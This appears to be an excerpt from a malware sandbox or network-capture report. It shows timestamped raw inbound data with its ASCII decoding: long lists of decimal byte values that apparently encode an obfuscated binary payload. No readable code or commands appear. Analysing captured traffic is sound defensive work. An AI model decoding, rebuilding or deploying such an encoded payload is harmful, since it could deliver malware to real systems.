                    2021-10-26 16:59:38 UTC1744INData Raw: 36 31 20 31 38 20 32 34 36 20 38 34 20 31 31 34 20 31 31 37 20 39 34 20 31 32 32 20 35 32 20 33 39 20 31 36 33 20 32 32 20 32 35 32 20 31 31 34 20 31 31 37 20 31 30 39 20 39 34 20 34 38 20 33 38 20 32 34 20 33 33 20 31 32 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 35 20 32 20 35 37 20 35 30 20 31 31 35 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 36 35 20 31 20 38 34 20 31 31 34 20 31 32 37 20 31 31 36 20 39 33 20 32 36 20 32 32 20 36 35 20 31 34 20 38 34 20 31 31 34 20 31 32 37 20 31 32 32 20 39 33 20 32 30 20 32 32 20 36 35 20 31 35 20 38 34 20 31 31 34 20 31 32 37 20 31 32 33 20 39 32 20 32 32 20 32 32 20 36 35 20 31 32 20 38 34 20 31 31 34 20 31 32 37 20 32 33 37 20 31 31 36 20 35 30 20 34 38 20 35 34 20 36 39 20
                    Data Ascii: 61 18 246 84 114 117 94 122 52 39 163 22 252 114 117 109 94 48 38 24 33 126 114 117 109 115 2 57 50 115 84 114 117 109 112 50 48 65 1 84 114 127 116 93 26 22 65 14 84 114 127 122 93 20 22 65 15 84 114 127 123 92 22 22 65 12 84 114 127 237 116 50 48 54 69
                    2021-10-26 16:59:38 UTC1746INData Raw: 31 31 36 20 38 33 20 37 30 20 31 35 38 20 32 30 20 32 37 20 31 39 35 20 32 38 20 38 37 20 31 30 38 20 31 31 31 20 36 34 20 31 31 37 20 32 30 20 32 38 20 33 39 20 32 39 20 38 37 20 38 34 20 39 34 20 31 34 38 20 38 30 20 32 33 31 20 31 36 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 36 35 20 31 31 36 20 35 30 20 35 34 20 39 34 20 38 20 31 31 39 20 31 31 31 20 31 32 20 35 33 20 34 38 20 35 30 20 35 30 20 35 39 20 31 31 33 20 31 31 37 20 31 30 39 20 39 31 20 32 34 20 34 38 20 35 30 20 34 35 20 31 30 30 20 31 31 39 20 31 31 37 20 31 30 34 20 31 31 33 20 35 30 20 34 38 20 35 39 20 35 34 20 38 34 20 39 39 20 31 31 39 20 32 32 35 20 31 32 30 20 35 30 20 34 38 20 34 31 20 32 36 20 37 30 20 31 32 35 20 31 31 37 20 31 34 37 20
                    Data Ascii: 116 83 70 158 20 27 195 28 87 108 111 64 117 20 28 39 29 87 84 94 148 80 231 16 226 40 124 141 117 109 118 65 116 50 54 94 8 119 111 12 53 48 50 50 59 113 117 109 91 24 48 50 45 100 119 117 104 113 50 48 59 54 84 99 119 225 120 50 48 41 26 70 125 117 147
                    2021-10-26 16:59:38 UTC1747INData Raw: 20 31 30 39 20 31 31 32 20 34 31 20 32 36 20 32 30 20 32 39 20 31 34 30 20 38 34 20 39 34 20 31 33 39 20 38 36 20 32 35 20 31 39 33 20 33 33 20 36 20 38 30 20 31 31 34 20 31 30 34 20 31 30 39 20 31 31 32 20 35 30 20 35 39 20 35 30 20 35 34 20 36 39 20 31 31 32 20 31 30 37 20 31 31 35 20 39 33 20 33 32 20 32 32 20 34 39 20 34 35 20 36 36 20 39 34 20 31 32 32 20 37 35 20 38 38 20 39 36 20 34 38 20 35 30 20 36 30 20 31 32 34 20 33 33 20 31 31 37 20 31 30 39 20 31 32 32 20 32 34 20 32 32 20 32 35 20 32 31 38 20 31 31 34 20 38 39 20 31 35 34 20 31 30 39 20 31 31 32 20 35 30 20 33 35 20 32 20 35 33 20 38 34 20 31 32 35 20 31 31 37 20 31 30 39 20 31 31 32 20 36 32 20 34 38 20 35 30 20 33 39 20 38 36 20 31 30 36 20 39 38 20 36 34 20 31 31 39 20 32 30 20 32 34 20
                    Data Ascii: 109 112 41 26 20 29 140 84 94 139 86 25 193 33 6 80 114 104 109 112 50 59 50 54 69 112 107 115 93 32 22 49 45 66 94 122 75 88 96 48 50 60 124 33 117 109 122 24 22 25 218 114 89 154 109 112 50 35 2 53 84 125 117 109 112 62 48 50 39 86 106 98 64 119 20 24
                    2021-10-26 16:59:38 UTC1748INData Raw: 34 20 31 31 34 20 31 30 37 20 31 30 39 20 31 31 32 20 35 30 20 32 38 20 35 30 20 35 34 20 38 34 20 38 39 20 36 37 20 39 38 20 31 31 32 20 37 33 20 31 38 31 20 35 30 20 35 34 20 38 30 20 39 30 20 31 31 30 20 31 30 39 20 31 31 32 20 35 32 20 32 37 20 32 36 20 35 37 20 38 34 20 39 20 32 34 30 20 31 30 39 20 31 31 32 20 35 34 20 32 34 20 34 36 20 35 34 20 38 34 20 31 31 36 20 39 34 20 31 31 39 20 31 32 37 20 35 30 20 37 35 20 31 38 33 20 35 34 20 38 34 20 31 31 38 20 39 33 20 31 31 32 20 31 31 32 20 35 30 20 35 34 20 32 35 20 35 38 20 39 31 20 31 31 34 20 31 34 20 32 33 32 20 31 31 32 20 35 30 20 35 32 20 32 36 20 34 30 20 38 34 20 31 31 34 20 31 31 35 20 37 31 20 31 31 32 20 35 30 20 34 38 20 33 33 20 36 20 38 37 20 31 31 34 20 32 39 20 31 30 39 20 31 31 32
                    Data Ascii: 4 114 107 109 112 50 28 50 54 84 89 67 98 112 73 181 50 54 80 90 110 109 112 52 27 26 57 84 9 240 109 112 54 24 46 54 84 116 94 119 127 50 75 183 54 84 118 93 112 112 50 54 25 58 91 114 14 232 112 50 52 26 40 84 114 115 71 112 50 48 33 6 87 114 29 109 112
                    2021-10-26 16:59:38 UTC1750INData Raw: 35 33 20 33 39 20 38 32 20 32 35 34 20 36 31 20 31 30 39 20 31 31 32 20 35 31 20 39 35 20 31 30 35 20 35 34 20 38 34 20 31 32 30 20 39 34 20 35 39 20 39 37 20 35 34 20 37 35 20 33 32 20 35 34 20 38 34 20 31 31 38 20 31 32 35 20 36 37 20 31 32 36 20 33 35 20 35 32 20 35 38 20 37 35 20 37 30 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 33 20 31 37 38 20 35 38 20 35 30 20 35 34 20 38 30 20 39 39 20 31 31 33 20 32 32 20 31 30 30 20 35 30 20 34 38 20 35 34 20 33 39 20 38 31 20 39 30 20 34 37 20 31 30 38 20 31 31 32 20 35 32 20 32 39 20 32 38 20 34 39 20 36 39 20 31 31 36 20 32 34 39 20 33 37 20 31 31 32 20 35 30 20 34 39 20 39 33 20 31 30 39 20 38 34 20 31 31 34 20 31 32 37 20 31 32 32 20 32 34 30 20 35 39 20 34 38 20 35 30 20 35 30 20 31 31 36 20 32 33 33 20
                    Data Ascii: 53 39 82 254 61 109 112 51 95 105 54 84 120 94 59 97 54 75 32 54 84 118 125 67 126 35 52 58 75 70 114 117 105 103 178 58 50 54 80 99 113 22 100 50 48 54 39 81 90 47 108 112 52 29 28 49 69 116 249 37 112 50 49 93 109 84 114 127 122 240 59 48 50 50 116 233
                    2021-10-26 16:59:38 UTC1751INData Raw: 32 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 38 36 20 35 35 20 38 34 20 31 31 34 20 31 32 33 20 31 30 39 20 31 31 32 20 35 30 20 36 36 20 35 31 20 35 34 20 38 34 20 38 35 20 31 31 37 20 31 30 39 20 31 31 32 20 31 31 36 20 34 38 20 35 30 20 35 35 20 38 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 33 34 20 35 30 20 34 38 20 35 30 20 31 33 35 20 38 34 20 31 31 34 20 31 31 37 20 32 30 32 20 31 31 33 20 35 30 20 34 38 20 36 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 32 32 33 20 34 39 20 35 30 20 35 34 20 31 38 35 20 31 31 35 20 31 31 37 20 31 30 39 20 38 30 20 35 30 20 34 38 20 35 30 20 31 31 32 20 38 34 20 31
                    Data Ascii: 24 114 117 109 112 50 48 86 55 84 114 123 109 112 50 66 51 54 84 85 117 109 112 116 48 50 55 86 114 117 109 134 50 48 50 135 84 114 117 202 113 50 48 60 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 223 49 50 54 185 115 117 109 80 50 48 50 112 84 1
                    2021-10-26 16:59:38 UTC1752INData Raw: 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 39 20 31 30 39 20 31 35 38 20 35 30 20 32 35 20 33 37 20 35 35 20 39 30 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 33 33 20 30 20 35 38 20 35 34 20 31 31 33 20 31 31 34 20 31 31 37 20 31 30 39 20 39 39 20 35 30 20 34 38 20 33 35 20 37 32 20 32 33 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 33 20 33 37 20 33 38 20 33 37 20 31 38 37 20 33 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 37 20 33 31 20 33 33 20 32 30 20 34 38 20 36 36 20 31 31 32 20 32 34 39 20 37 37 20 31 31 32 20 35 30 20 34 39 20 31 34 34 20 34 38 20 31 32 34 20 31 39 36 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 35 38 20 32 35 20 32 31 39 20 38 34 20 31 31 34 20 31 31 37 20 36 33 20 31 34 20 31 31 33 20 34 38 20 35 30 20 35 30
                    Data Ascii: 51 38 84 114 119 109 158 50 25 37 55 90 114 117 109 112 33 0 58 54 113 114 117 109 99 50 48 35 72 23 114 117 105 103 37 38 37 187 38 114 117 108 107 31 33 20 48 66 112 249 77 112 50 49 144 48 124 196 117 109 118 24 58 25 219 84 114 117 63 14 113 48 50 50
                    2021-10-26 16:59:38 UTC1754INData Raw: 35 34 20 35 30 20 35 34 20 38 34 20 31 30 30 20 31 31 37 20 31 30 39 20 39 37 20 37 36 20 31 33 20 35 30 20 35 34 20 38 30 20 38 38 20 31 31 37 20 31 30 39 20 31 31 35 20 32 20 35 38 20 35 30 20 35 37 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 38 20 34 32 20 37 39 20 39 35 20 31 31 34 20 37 35 20 38 38 20 31 31 35 20 34 38 20 35 30 20 36 30 20 31 32 36 20 38 34 20 39 34 20 31 35 34 20 31 31 32 20 34 39 20 30 20 35 39 20 35 34 20 31 31 39 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 32 20 31 32 34 20 35 31 20 31 31 37 20 31 30 39 20 31 32 32 20 34 38 20 35 31 20 34 34 20 32 37 20 39 34 20 38 34 20 38 33 20 31 31 31 20 31 31 36 20 34 34 20 32 39 20 35 36 20 31 36 20 31 31 34 20 38 38
                    Data Ascii: 54 50 54 84 100 117 109 97 76 13 50 54 80 88 117 109 115 2 58 50 57 84 114 117 109 112 50 48 48 42 79 95 114 75 88 115 48 50 60 126 84 94 154 112 49 0 59 54 119 114 117 109 112 50 48 50 52 124 51 117 109 122 48 51 44 27 94 84 83 111 116 44 29 56 16 114 88
                    2021-10-26 16:59:38 UTC1755INData Raw: 20 36 34 20 31 31 38 20 32 35 20 35 31 20 32 30 20 32 39 20 31 36 30 20 38 38 20 31 31 39 20 31 32 33 20 31 30 31 20 33 31 20 33 34 20 32 30 20 37 37 20 37 37 20 31 31 34 20 31 31 37 20 31 30 35 20 31 31 35 20 34 36 20 34 35 20 33 31 20 36 30 20 31 31 34 20 32 39 20 32 34 20 31 30 39 20 31 31 32 20 35 36 20 32 36 20 32 30 20 32 39 20 31 38 34 20 38 34 20 39 34 20 31 35 33 20 31 31 35 20 32 20 35 38 20 35 30 20 36 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 38 20 33 32 20 37 34 20 39 35 20 31 32 37 20 37 35 20 31 31 20 34 33 20 34 38 20 35 30 20 35 30 20 31 32 31 20 31 31 36 20 39 34 20 31 31 30 20 38 36 20 32 35 20 31 39 36 20 32 34 20 35 32 20 37 36 20 31 30 37 20 38 38 20 31 32 37 20 38 36 20 37 33 20 34 31 20 35 30
                    Data Ascii: 64 118 25 51 20 29 160 88 119 123 101 31 34 20 77 77 114 117 105 115 46 45 31 60 114 29 24 109 112 56 26 20 29 184 84 94 153 115 2 58 50 6 84 114 117 109 112 50 48 48 32 74 95 127 75 11 43 48 50 50 121 116 94 110 86 25 196 24 52 76 107 88 127 86 73 41 50
                    2021-10-26 16:59:38 UTC1756INData Raw: 20 31 30 39 20 31 31 32 20 35 36 20 32 36 20 32 30 20 32 39 20 31 36 33 20 39 32 20 31 31 20 34 36 20 31 31 32 20 35 30 20 35 32 20 39 33 20 31 34 39 20 38 35 20 31 31 34 20 31 31 35 20 37 31 20 39 39 20 32 20 35 35 20 35 30 20 36 37 20 38 34 20 31 31 34 20 31 31 37 20 31 32 32 20 31 31 32 20 35 30 20 33 33 20 35 35 20 32 37 20 31 31 33 20 31 31 32 20 31 34 20 31 31 38 20 31 31 32 20 35 30 20 35 32 20 31 38 20 31 38 34 20 31 32 30 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 36 39 20 33 32 20 31 31 34 20 31 31 37 20 31 30 33 20 38 30 20 31 30 31 20 32 38 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 31 33 31 20 35 30 20 35 34 20 38 32 20 38 38 20 31 31 20 34 36 20 31 31 32 20 35
                    Data Ascii: 109 112 56 26 20 29 163 92 11 46 112 50 52 93 149 85 114 115 71 99 2 55 50 67 84 114 117 122 112 50 33 55 27 113 112 14 118 112 50 52 18 184 120 162 107 69 143 50 48 52 69 32 114 117 103 80 101 28 226 40 124 141 117 109 118 26 131 50 54 82 88 11 46 112 5
                    2021-10-26 16:59:38 UTC1758INData Raw: 35 30 20 34 38 20 32 31 38 20 31 39 37 20 33 31 20 31 30 35 20 31 31 39 20 31 30 37 20 32 34 20 36 39 20 35 34 20 38 34 20 31 32 30 20 32 38 20 31 32 33 20 39 32 20 33 39 20 32 32 20 35 38 20 34 38 20 36 36 20 31 32 33 20 32 36 20 32 31 20 31 31 32 20 35 30 20 35 38 20 35 33 20 36 33 20 36 32 20 34 32 20 31 32 36 20 31 30 36 20 31 31 36 20 31 20 32 33 37 20 32 35 20 35 33 20 38 39 20 38 39 20 31 35 36 20 31 30 31 20 33 31 20 37 35 20 34 38 20 35 30 20 36 30 20 31 32 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 37 20 32 20 35 31 20 35 30 20 31 30 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 39 20 31 31 32 20 35 30 20 33 33 20 33 32 20 35 34 20 31 37 30 20 31 30 33 20 36 34 20 31 30 39 20 31 31 32 20 34 38 20 35 30 20 36 35 20 37 36 20 38 34 20 31 31 34
                    Data Ascii: 50 48 218 197 31 105 119 107 24 69 54 84 120 28 123 92 39 22 58 48 66 123 26 21 112 50 58 53 63 62 42 126 106 116 1 237 25 53 89 89 156 101 31 75 48 50 60 126 114 117 109 107 2 51 50 104 84 114 117 119 112 50 33 32 54 170 103 64 109 112 48 50 65 76 84 114
                    2021-10-26 16:59:38 UTC1759INData Raw: 38 20 37 36 20 37 39 20 35 30 20 35 34 20 39 34 20 38 38 20 31 31 39 20 31 31 36 20 31 30 33 20 36 35 20 37 30 20 35 30 20 35 34 20 39 34 20 31 30 35 20 38 38 20 31 31 36 20 38 36 20 35 38 20 31 36 20 35 30 20 35 34 20 34 20 31 31 34 20 31 31 38 20 36 39 20 31 38 20 35 31 20 34 38 20 35 32 20 34 37 20 31 32 31 20 31 32 36 20 38 33 20 31 30 31 20 33 31 20 37 35 20 34 38 20 35 30 20 36 30 20 38 33 20 38 38 20 31 32 31 20 37 30 20 31 34 39 20 35 37 20 32 37 20 31 39 32 20 35 34 20 38 34 20 31 31 34 20 31 30 32 20 39 33 20 31 31 37 20 35 30 20 37 32 20 35 30 20 35 34 20 38 34 20 31 30 38 20 31 31 37 20 31 30 39 20 39 37 20 34 38 20 34 31 20 33 37 20 36 39 20 33 34 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 39 20 33 31 20 33 30 20 32 30 20 33 39 20 38 31 20
                    Data Ascii: 8 76 79 50 54 94 88 119 116 103 65 70 50 54 94 105 88 116 86 58 16 50 54 4 114 118 69 18 51 48 52 47 121 126 83 101 31 75 48 50 60 83 88 121 70 149 57 27 192 54 84 114 102 93 117 50 72 50 54 84 108 117 109 97 48 41 37 69 34 114 117 103 109 31 30 20 39 81
                    2021-10-26 16:59:38 UTC1760INData Raw: 34 20 38 34 20 39 39 20 31 31 39 20 31 31 36 20 31 30 32 20 33 30 20 35 35 20 32 30 20 37 37 20 31 31 32 20 31 31 34 20 31 31 37 20 31 30 35 20 39 30 20 32 30 20 32 37 20 31 39 37 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 39 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 35 20 34 34 20 32 39 20 36 32 20 31 36 20 31 31 34 20 31 31 32 20 31 34 20 37 32 20 31 31 32 20 35 30 20 35 32 20 33 30 20 34 32 20 31 32 37 20 31 31 37 20 38 20 37 33 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 31 37 20 38 36 20 39 20 38 33 20 31 30 39 20 31 31 32 20 35 34 20 33 38 20 34 38 20 37 37 20 31 31 32 20 31 31 34 20 31 31 37 20 31 30 35 20 33 31 20 31 38 31 20 34 38 20 35 30 20 36 30 20 31 31 34 20 38 38 20 31 30 32 20
                    Data Ascii: 4 84 99 119 116 102 30 55 20 77 112 114 117 105 90 20 27 197 54 87 66 124 109 92 50 48 50 54 84 114 117 111 115 44 29 62 16 114 112 14 72 112 50 52 30 42 127 117 8 73 112 50 52 25 217 86 9 83 109 112 54 38 48 77 112 114 117 105 31 181 48 50 60 114 88 102
                    2021-10-26 16:59:38 UTC1762INData Raw: 39 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 31 39 20 34 31 20 39 31 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 31 39 33 20 35 30 20 34 35 20 31 30 30 20 31 31 33 20 31 31 37 20 33 38 20 31 31 32 20 35 30 20 34 38 20 31 39 20 35 34 20 38 34 20 39 39 20 31 31 39 20 32 32 20 38 39 20 35 30 20 34 38 20 35 34 20 34 32 20 31 32 31 20 31 32 33 20 38 33 20 31 30 36 20 38 38 20 31 38 37 20 34 38 20 35 30 20 36 30 20 31 32 37 20 31 31 33 20 31 32 36 20 37 30 20 31 33 33 20 34 38 20 37 35 20 32 37 20 35 34 20 38 34 20 31 31 38 20 31 31 38 20 32 20 32 35 32 20 35 30 20 34 38 20 35 36 20 32 36 20 36 35 20 31 31 32 20 31 34 20 36 38 20 31 31 32 20 35 30 20 35 32 20 34 39 20 38 39 20 32 31 37 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 35 20 33 31 20 35 31 20
                    Data Ascii: 9 112 50 52 25 219 41 91 117 109 116 25 193 50 45 100 113 117 38 112 50 48 19 54 84 99 119 22 89 50 48 54 42 121 123 83 106 88 187 48 50 60 127 113 126 70 133 48 75 27 54 84 118 118 2 252 50 48 56 26 65 112 14 68 112 50 52 49 89 217 114 117 103 105 31 51
                    2021-10-26 16:59:38 UTC1763INData Raw: 31 31 37 20 31 30 39 20 38 33 20 35 30 20 34 38 20 33 35 20 35 32 20 34 37 20 39 31 20 31 31 37 20 31 30 39 20 31 31 36 20 34 32 20 32 39 20 35 39 20 31 36 20 38 33 20 39 30 20 32 35 32 20 31 30 39 20 31 31 32 20 35 36 20 32 37 20 34 39 20 36 31 20 31 32 37 20 31 33 35 20 31 31 39 20 32 32 20 38 39 20 35 30 20 34 38 20 35 34 20 35 33 20 35 39 20 32 35 34 20 31 31 37 20 31 30 39 20 31 32 32 20 34 36 20 32 39 20 34 39 20 31 36 20 31 33 38 20 31 32 30 20 31 32 37 20 37 30 20 31 33 39 20 35 33 20 32 34 20 31 38 34 20 35 34 20 38 34 20 31 32 30 20 31 36 39 20 31 30 37 20 39 30 20 35 36 20 34 39 20 33 34 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 31 32 30 20 31 31 32 20 33 39 20 32 36 20 35 30 20 34 39 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 37
                    Data Ascii: 117 109 83 50 48 35 52 47 91 117 109 116 42 29 59 16 83 90 252 109 112 56 27 49 61 127 135 119 22 89 50 48 54 53 59 254 117 109 122 46 29 49 16 138 120 127 70 139 53 24 184 54 84 120 169 107 90 56 49 34 54 84 112 117 120 112 39 26 50 49 84 114 117 109 107
                    2021-10-26 16:59:38 UTC1764INData Raw: 31 34 37 20 38 34 20 31 31 34 20 31 32 37 20 31 31 37 20 39 33 20 33 30 20 32 32 20 36 35 20 31 38 39 20 38 34 20 31 31 34 20 31 32 37 20 32 33 37 20 36 36 20 35 30 20 34 38 20 35 34 20 33 30 20 32 34 32 20 31 31 34 20 31 31 37 20 31 30 33 20 38 38 20 31 34 39 20 34 38 20 35 30 20 36 30 20 31 32 34 20 32 35 20 31 31 37 20 31 30 39 20 31 31 38 20 33 31 20 34 34 20 32 35 20 33 35 20 32 31 32 20 35 36 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 32 35 30 20 31 37 38 20 32 38 20 38 34 20 31 31 34 20 31 31 33 20 37 30 20 31 38 38 20 31 37 38 20 32 38 20 35 30 20 35 34 20 38 30 20 38 39 20 31 38 37 20 36 39 20 33 31 20 35 30 20 34 38 20 35 32 20 33 30 20 33 38 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 36 35 20 34 38 20 35 30 20 34 38 20 31 32 34 20 36
                    Data Ascii: 147 84 114 127 117 93 30 22 65 189 84 114 127 237 66 50 48 54 30 242 114 117 103 88 149 48 50 60 124 25 117 109 118 31 44 25 35 212 56 117 109 116 25 250 178 28 84 114 113 70 188 178 28 50 54 80 89 187 69 31 50 48 52 30 38 114 117 107 88 65 48 50 48 124 6
                    2021-10-26 16:59:38 UTC1766INData Raw: 20 35 34 20 39 34 20 39 30 20 36 38 20 31 30 38 20 31 31 32 20 35 32 20 39 35 20 31 35 35 20 35 34 20 38 34 20 31 32 30 20 39 33 20 31 39 37 20 31 31 32 20 35 30 20 35 38 20 31 37 38 20 37 32 20 38 34 20 31 31 34 20 31 31 33 20 31 39 20 31 33 20 35 30 20 34 38 20 35 34 20 33 30 20 32 31 33 20 31 31 34 20 31 31 37 20 31 30 37 20 32 34 30 20 37 32 20 34 38 20 35 30 20 35 30 20 31 32 34 20 32 31 36 20 31 31 37 20 31 30 39 20 31 32 32 20 39 33 20 31 35 35 20 35 30 20 35 34 20 39 34 20 32 39 20 32 31 37 20 31 30 39 20 31 31 32 20 35 36 20 34 33 20 32 30 34 20 35 32 20 32 31 32 20 31 34 20 31 31 37 20 31 30 39 20 31 31 36 20 37 36 20 37 33 20 35 30 20 35 34 20 38 30 20 39 30 20 31 30 38 20 31 30 38 20 31 31 32 20 35 32 20 35 38 20 33 32 20 35 34 20 34 37 20 32
                    Data Ascii: 54 94 90 68 108 112 52 95 155 54 84 120 93 197 112 50 58 178 72 84 114 113 19 13 50 48 54 30 213 114 117 107 240 72 48 50 50 124 216 117 109 122 93 155 50 54 94 29 217 109 112 56 43 204 52 212 14 117 109 116 76 73 50 54 80 90 108 108 112 52 58 32 54 47 2
                    2021-10-26 16:59:38 UTC1767INData Raw: 31 30 37 20 35 34 20 38 34 20 31 32 30 20 31 32 30 20 31 39 20 39 32 20 35 30 20 34 38 20 35 34 20 38 39 20 32 32 38 20 31 31 34 20 31 31 37 20 31 30 33 20 39 39 20 35 36 20 32 37 20 32 37 20 33 36 20 39 34 20 39 30 20 31 39 36 20 31 30 39 20 31 31 32 20 35 36 20 33 35 20 35 35 20 37 32 20 31 32 36 20 31 31 34 20 31 31 37 20 31 30 35 20 39 38 20 35 35 20 32 34 20 31 32 38 20 35 34 20 38 34 20 31 32 30 20 32 36 20 31 33 20 31 31 32 20 35 30 20 35 38 20 33 31 20 35 39 20 39 33 20 39 36 20 31 31 32 20 36 39 20 31 39 34 20 35 30 20 34 38 20 35 36 20 38 39 20 31 34 20 31 31 34 20 31 31 37 20 31 30 33 20 39 38 20 35 36 20 32 34 20 31 32 39 20 35 34 20 38 34 20 31 32 30 20 38 38 20 31 36 33 20 31 37 34 20 36 30 20 33 34 20 35 36 20 32 30 30 20 36 36 20 31 30 30
                    Data Ascii: 107 54 84 120 120 19 92 50 48 54 89 228 114 117 103 99 56 27 27 36 94 90 196 109 112 56 35 55 72 126 114 117 105 98 55 24 128 54 84 120 26 13 112 50 58 31 59 93 96 112 69 194 50 48 56 89 14 114 117 103 98 56 24 129 54 84 120 88 163 174 60 34 56 200 66 100
                    2021-10-26 16:59:38 UTC1768INData Raw: 20 31 31 32 20 31 35 33 20 34 39 20 35 30 20 35 34 20 31 32 36 20 31 31 34 20 31 31 37 20 31 32 34 20 31 34 20 37 39 20 34 38 20 35 30 20 35 30 20 31 31 36 20 38 36 20 38 35 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 39 30 20 32 32 31 20 31 30 39 20 31 31 32 20 35 36 20 33 39 20 33 31 20 36 31 20 31 31 34 20 31 31 36 20 39 33 20 31 39 35 20 31 31 32 20 35 30 20 35 38 20 33 31 20 34 38 20 31 32 37 20 31 31 33 20 31 32 37 20 37 30 20 31 33 31 20 32 34 20 35 34 20 32 36 20 31 35 33 20 38 34 20 31 31 34 20 31 32 37 20 31 31 35 20 39 33 20 33 30 20 32 32 20 35 33 20 33 30 20 31 32 37 20 31 31 35 20 31 31 37 20 31 30 37 20 31 31 30 20 33 31 20 32 31 20 32 30 20 36 33 20 36 36 20 32 33 32 20 31 32 20 39 35 20 31 31 32 20 35 30 20
                    Data Ascii: 112 153 49 50 54 126 114 117 124 14 79 48 50 50 116 86 85 189 110 26 207 50 54 82 90 221 109 112 56 39 31 61 114 116 93 195 112 50 58 31 48 127 113 127 70 131 24 54 26 153 84 114 127 115 93 30 22 53 30 127 115 117 107 110 31 21 20 63 66 232 12 95 112 50
                    2021-10-26 16:59:38 UTC1770INData Raw: 30 20 34 38 20 35 36 20 33 37 20 38 32 20 39 39 20 31 31 35 20 37 37 20 31 36 36 20 31 39 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 33 34 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 20 31 31 37 20 31 30 39 20 31 32 32 20 32 33 36 20 34 38 20 32 34 20 35 36 20 32 31 20 31 31 30 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 31 36 20 38 34 20 31 31 34 20 31 31 37 20 39 20 31 31 33 20 35 30 20 34 38 20 31 38 34 20 35 35 20 38 34 20 31 31 34 20 38 35 20 31 30 39 20 31 31 32 20 35 30 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 30 35 20 36 39 20 31 31 30 20 31 31 32 20 31 39 39 20 34 38 20 35 30 20 35 34 20 31 32 37 20 31 31 34 20 31 31 37 20 31 32 34 20 31 34 20 37 39 20 34 38 20 35 30
                    Data Ascii: 0 48 56 37 82 99 115 77 166 19 224 44 30 171 114 117 107 88 134 48 50 48 124 19 117 109 122 236 48 24 56 21 110 117 109 112 50 48 50 16 84 114 117 9 113 50 48 184 55 84 114 85 109 112 50 118 50 54 85 105 69 110 112 199 48 50 54 127 114 117 124 14 79 48 50
                    2021-10-26 16:59:38 UTC1771INData Raw: 30 20 39 33 20 32 32 39 20 31 31 34 20 31 32 33 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 37 33 20 31 31 34 20 31 39 34 20 31 38 35 20 31 31 32 20 31 38 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 30 35 20 36 39 20 31 31 30 20 31 31 32 20 31 33 35 20 34 38 20 35 30 20 35 34 20 31 32 30 20 31 31 34 20 31 31 37 20 31 32 34 20 38 30 20 32 31 32 20 31 37 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 31 33 33 20 35 30 20 35 34 20 38 32 20 31 32 20 38 39 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 31 33 30 20 35 34 20 38 34 20 31 32 30 20 31 30 34 20 36 34 20 31 31 38 20 32 30 20 38 20 39 33 20 35 34 20 38 34 20 31 31 34 20 31 32 30 20 37 30 20 31 33 36 20 33 32 20 35 31 20 32 36 20 31 33 35
                    Data Ascii: 0 93 229 114 123 109 112 50 48 50 54 73 114 194 185 112 18 118 50 54 85 105 69 110 112 135 48 50 54 120 114 117 124 80 212 17 226 40 124 141 117 109 118 26 133 50 54 82 12 89 109 112 54 95 130 54 84 120 104 64 118 20 8 93 54 84 114 120 70 136 32 51 26 135
